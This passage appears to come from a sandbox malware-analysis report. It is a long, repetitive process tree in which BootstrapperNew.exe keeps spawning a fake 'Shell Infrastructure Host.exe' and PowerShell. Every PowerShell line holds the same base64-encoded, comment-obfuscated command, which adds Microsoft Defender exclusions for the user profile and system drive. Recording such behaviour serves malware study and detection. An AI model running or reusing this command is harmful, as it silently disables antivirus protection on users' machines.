        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        228⤵
        
        PID:7780
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        228⤵
        
        PID:1064
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        228⤵
        
        PID:5180
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        229⤵
        
        PID:6676
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        229⤵
        
        PID:4984
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        229⤵
        
        PID:5544
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        230⤵
        
        PID:7632
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        230⤵
        
        PID:2696
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        230⤵
        
        PID:5764
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        231⤵
        
        PID:6008
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        231⤵
        
        PID:5384
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        231⤵
        
        PID:6608
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        232⤵
        
        PID:5608
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        232⤵
        
        PID:8024
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        232⤵
        
        PID:6532
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        233⤵
        
        PID:3228
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        233⤵
        
        PID:5972
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        233⤵
        
        PID:6916
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        234⤵
        
        PID:6704
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        234⤵
        
        PID:828
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        234⤵
        
        PID:1080
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        235⤵
        
        PID:5144
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        235⤵
        
        PID:7792
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        235⤵
        
        PID:7404
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        236⤵
        
        PID:7808
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        236⤵
        
        PID:5876
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        236⤵
        
        PID:7872
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        237⤵
        
        PID:4500
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        237⤵
        
        PID:6796
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        237⤵
        
        PID:2244
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        238⤵
        
        PID:6820
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        238⤵
        
        PID:2380
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        238⤵
        
        PID:5560
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        239⤵
        
        PID:7008
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        239⤵
        
        PID:6884
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        239⤵
        
        PID:5308
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        240⤵
        
        PID:7076
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        240⤵
        
        PID:2444
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        240⤵
        
        PID:1428
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        241⤵
        
        PID:7296
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        241⤵
        
        PID:4192
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        241⤵
        
        PID:8180
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        242⤵
        
        PID:4432
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        242⤵
        
        PID:4904
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        242⤵
        
        PID:6812
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        243⤵
        
        PID:624
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        243⤵
        
        PID:3900
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        243⤵
        
        PID:5248
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        244⤵
        
        PID:5644
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        244⤵
        
        PID:7876
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        244⤵
        
        PID:468
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        245⤵
        
        PID:2936
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        245⤵
        
        PID:5256
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        245⤵
        
        PID:2060
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        246⤵
        
        PID:3040
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        246⤵
        
        PID:7772
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        246⤵
        
        PID:3176
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        247⤵
        
        PID:5124
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        247⤵
        
        PID:5016
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        247⤵
        
        PID:3544
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        248⤵
        
        PID:2032
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        248⤵
        
        PID:6992
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        248⤵
        
        PID:5248
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        249⤵
        
        PID:7964
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        249⤵
        
        PID:7544
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        249⤵
        
        PID:8124
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        250⤵
        
        PID:5532
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        250⤵
        
        PID:7600
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        250⤵
        
        PID:5580
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        251⤵
        
        PID:8032
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        251⤵
        
        PID:1020
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        251⤵
        
        PID:7896
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        252⤵
        
        PID:1916
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        252⤵
        
        PID:4744
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        252⤵
        
        PID:8080
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        253⤵
        
        PID:2396
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        253⤵
        
        PID:2228
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        253⤵
        
        PID:5860
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        254⤵
        
        PID:4984
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        254⤵
        
        PID:7192
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        254⤵
        
        PID:5248
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        255⤵
        
        PID:3684
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        255⤵
        
        PID:1564
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        255⤵
        
        PID:3560
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
